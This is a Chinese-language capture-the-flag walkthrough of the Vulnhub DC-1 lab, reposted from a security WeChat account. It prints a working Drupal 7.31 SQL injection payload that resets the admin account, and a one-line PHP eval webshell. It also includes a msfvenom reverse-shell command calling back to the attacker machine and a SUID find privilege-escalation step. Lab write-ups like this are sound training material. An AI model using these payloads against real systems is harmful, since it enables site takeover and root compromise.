Vulnhub靶机: DC-1

admin 2022年8月28日23:09:53安全文章评论2 views1333字阅读4分26秒阅读模式

目标机:192.168.119.145

攻击机(kali):192.168.119.140

(flag信息在文章最后)

首先使用nmap对目标主机进行端口探测,发现存在22、80等端口信息:

Vulnhub靶机: DC-1


然后访问80端口 http://192.168.119.145/,发现是一个Drupal站点:

Vulnhub靶机: DC-1

用whatweb进行网站信息搜集,发现Drupal的版本是7:

Vulnhub靶机: DC-1


去搜索了下Drupal7版本的漏洞,通过对比登录数据包发现该站点存在Drupal7.31版本SQL注入漏洞:

(登录数据包如下)

Vulnhub靶机: DC-1

使用该payload:

name[0%20;update+users+set+name%3d'owned'+,+pass+%3d+'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld'+where+uid+%3d+'1';;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in

注入成功,添加了用户名为“owned”密码为“thanks”的用户,权限为admin:

Vulnhub靶机: DC-1


登录网页后,在Modules处发现允许使用PHP代码,开启该功能:

Vulnhub靶机: DC-1


然后添加新文章:content->add content ->article

在body里写入:

<?php phpinfo();?>

text format选择PHP_CODE,保存文章后得到回显:

Vulnhub靶机: DC-1


随后在新文章中写入一句话木马,并用蚁剑连接http://192.168.119.145/node/6(这里的6是文章的编号)得到webshell:

<?php @eval($_POST['cmd']);?>

Vulnhub靶机: DC-1


查看当前权限,发现并不是root权限:

Vulnhub靶机: DC-1


接下来进行提权操作。

经过尝试无法使用一句话反弹shell。所以使用msf生成木马文件,并用webshell上传,通过访问该文件实现反弹shell。


首先使用msf生成木马文件:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.119.140 lport=7777 R > getshell.php

Vulnhub靶机: DC-1


然后设置监听:

Vulnhub靶机: DC-1


因为我是将文件上传到WWW目录下,所以直接访问192.168.119.145/getshell.php。


成功反弹shell,开始进行linux提权。这里运用的是SUID方式提权。

首先查看那些文件拥有SUID标志位:

find / -perm -u=s -type f 2>/dev/null

然后发现find命令在其中,故使用find命令提权:

touch tefind te -exec '/bin/sh' ;

Vulnhub靶机: DC-1

成功拿到root权限。


关于flag:

Vulnhub靶机: DC-1

1.根据flag1提示,去配置文件中查找,但是查找config文件无果,所以百度一下drupal配置文件位置,为settings.php。打开该文件,得到flag2;

2.flag3位于网页里的content;

3.根据flag4提示,最后的flag在root文件中,这里由于已经完成提权,故可直接访问。


原文始发于微信公众号(陆吾安全攻防实验室):Vulnhub靶机: DC-1

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月28日23:09:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Vulnhub靶机: DC-1 http://cn-sec.com/archives/1067451.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: